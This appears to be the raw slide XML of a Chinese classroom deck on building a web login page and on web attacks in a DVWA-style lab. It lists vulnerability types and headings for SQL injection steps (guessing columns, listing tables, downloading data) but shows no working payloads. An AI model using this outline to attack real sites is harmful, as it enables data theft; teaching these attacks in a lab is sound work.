              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注）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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）（反射型跨站脚本）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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）（存储型跨站脚本）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8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8850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Brute Force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（暴力（破解））</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（命令行注入）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（跨站请求伪造）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>File Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（文件包含）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>File Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（文件上传）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Insecure CAPTCHA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（不安全的验证码）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SQL Injection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注入）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SQL Injection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Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）（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盲注）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XSS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Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）（反射型跨站脚本）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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）（存储型跨站脚本）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3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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t>登录界面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框架</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" smtClean="0"/>
          </a:p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代码讲解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13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需要的软件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XAMPP: Apache, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>PHPStorm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
              <a:t>: html,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>php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6848" y="1440873"/>
            <a:ext cx="8915400" cy="3777622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>代码说明：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2" y="1976582"/>
            <a:ext cx="9751723" cy="48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后端的维护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打开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服务器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新建数据库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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>和数据库连接并且操作数据库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19564"/>
            <a:ext cx="8915400" cy="4091658"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Brute Force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（暴力（破解））</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（命令行注入）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（跨站请求伪造）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>File Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（文件包含）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>File Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（文件上传）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Insecure CAPTCHA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（不安全的验证码）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SQL Injection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注入）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注）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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）（反射型跨站脚本）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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）（存储型跨站脚本）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0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1007</Words>
  <Application>Microsoft Office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幼圆</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>丝状</vt:lpstr>
      <vt:lpstr>Web登录界面及Web攻击</vt:lpstr>
      <vt:lpstr>Web登录界面</vt:lpstr>
      <vt:lpstr>Web攻击</vt:lpstr>
      <vt:lpstr>Web攻击</vt:lpstr>
      <vt:lpstr>Web登录界面</vt:lpstr>
      <vt:lpstr>需要的软件</vt:lpstr>
      <vt:lpstr>前端的编写</vt:lpstr>
      <vt:lpstr>后端的维护</vt:lpstr>
      <vt:lpstr>Web攻击</vt:lpstr>
      <vt:lpstr>SQL Injection（SQL注入）  目标：获得用户的登录信息 </vt:lpstr>
      <vt:lpstr>2.猜解SQL查询语句中的字段数</vt:lpstr>
      <vt:lpstr>3. 获取当前数据库 </vt:lpstr>
      <vt:lpstr>4.获取数据库中的表 </vt:lpstr>
      <vt:lpstr>5.获取表中的字段名 </vt:lpstr>
      <vt:lpstr>6.下载数据 </vt:lpstr>
      <vt:lpstr>Medium级别的sql注入</vt:lpstr>
      <vt:lpstr>High级别的sql注入</vt:lpstr>
      <vt:lpstr>Impossible级别的sql注入攻击</vt:lpstr>
      <vt:lpstr>SQL Injection（Blind）（SQL盲注）</vt:lpstr>
      <vt:lpstr>基于时间的盲注</vt:lpstr>
      <vt:lpstr>XSS（Reflected）（反射型跨站脚本）</vt:lpstr>
      <vt:lpstr>资料来源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Web登陆界面</dc:title>
  <dc:creator>田宝林</dc:creator>
  <cp:lastModifiedBy>田宝林</cp:lastModifiedBy>
  <cp:revision>49</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-18T11:13:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-28T13:21:31Z</dcterms:modified>
</cp:coreProperties>
</file>